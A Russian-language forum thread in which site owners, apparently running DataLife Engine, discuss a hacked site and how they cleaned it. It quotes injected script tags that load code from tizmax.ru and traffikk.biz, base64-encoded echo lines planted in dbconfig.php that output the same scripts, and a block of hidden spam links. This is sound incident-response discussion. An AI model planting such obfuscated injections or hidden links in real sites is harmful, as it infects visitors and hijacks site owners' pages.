Перейти к публикации

Рекомендованные сообщения

Здравствуйте. Сегодня утром обнаружил, что оказывается на сайте уже 3 админа ( вместе со мною).Естественно принял меры. Двоих удалил. Поменял пароль ну и другие меры. Также обнаружил, что в шапке сайта прописан код <script language="JavaScript" type="text/javascript" charset="windows-1251" src="http://tizmax.ru/codes/iframe.php?id=90"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7514"></script>.Кто сталкивался с этой проблемой подскажите как удалить эту заразу.

Заранее благодарен.

Ссылка на сообщение
Поделиться на других сайтах

Для начала смените пароли на хостинговую панель управления, БД, ФТП и админку. Больше тут ничего не посоветуешь.

Удалите лишний код вручную из шаблонов.

Изменено пользователем zgr
Ссылка на сообщение
Поделиться на других сайтах

Для начала смените пароли на БД, ФТП и админку. Больше тут ничего не посоветуешь.

Удалите лишний код вручную из шаблонов.

Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет.

Ссылка на сообщение
Поделиться на других сайтах

Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет.

И не забудьте поставить патчи http://dle-news.ru/bags/

Ссылка на сообщение
Поделиться на других сайтах

Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь.

Убрал бы права на запись, оставив 444, это ты уже сам догадаешься.

Изменено пользователем Azat868
Ссылка на сообщение
Поделиться на других сайтах

Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь.

Убрал бы права на запись, оставив 444, это ты уже сам догадаешься.

Победа за нами. Код найден, удален.

1. В папке templates файл sistem.php вирус.

2. В файле dbconfig.php код

echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBjaGFyc2V0PSJ3aW5kb3dzLTEyNTEiIHNyYz0iaHR0cDovL3Rpem1heC5ydS9jb2Rlcy9pZnJhbWUucGhwP2lkPTkwIj48L3NjcmlwdD4=');

echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc1MTQiPjwvc2NyaXB0Pg==');

Вывод: Надо больше внимания уделять безопасности сайта.

Ссылка на сообщение
Поделиться на других сайтах

Вывод: Надо больше внимания уделять безопасности сайта.

Надо вовремя обновляться и ставить патчи.

Ссылка на сообщение
Поделиться на других сайтах

n0lik,

В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись.

Изменено пользователем Azat868
Ссылка на сообщение
Поделиться на других сайтах

n0lik,

В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись.

скажите тогда как будет вести себя веб шелл в папке /engine/ если злоумышленник залил его по фтп?

Тут уже никакие права доступа и прочее НЕПОМОЖЕТ, имхо права для доступа\записи это только часть.

Защищаться нужно не от взломщика а нужно защищать своё железо от вирусов. не более.

Ссылка на сообщение
Поделиться на других сайтах

Победа за нами. Код найден, удален.

Это не надолго, вам же написали, что ставьте патчи http://dle-news.ru/bags/ а вы этого до сих пор не сделали.

Ссылка на сообщение
Поделиться на других сайтах

таже фигня :) Наглые рожи прям в главную страницу вставили

<html><div style="position:absolute;top:-1000px;left:-1000px"><a href="http://new.turbinist.ru/uploads/images/index.html">Главная</a><br><a href="http://mysite.ru/uploads/images/sitemap.html">Знакомства любовь секс</a><br><a href="http://mysite.ru/uploads/images/minsk-znakomstva-devushki.html">Минск знакомства девушки</a><br><a href="http://mysite.ru/uploads/images/krivoy-rog-intim-znakomstva.html">Кривой рог интим знакомства</a><br></div></html>

</html>

в папку upload залили папку image,а в ней не поверите .html файлов аж на 27 метров :D :D :D :D :D и все про порно)). точно прийдется код доступа в панель хостинга))

Изменено пользователем temius
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...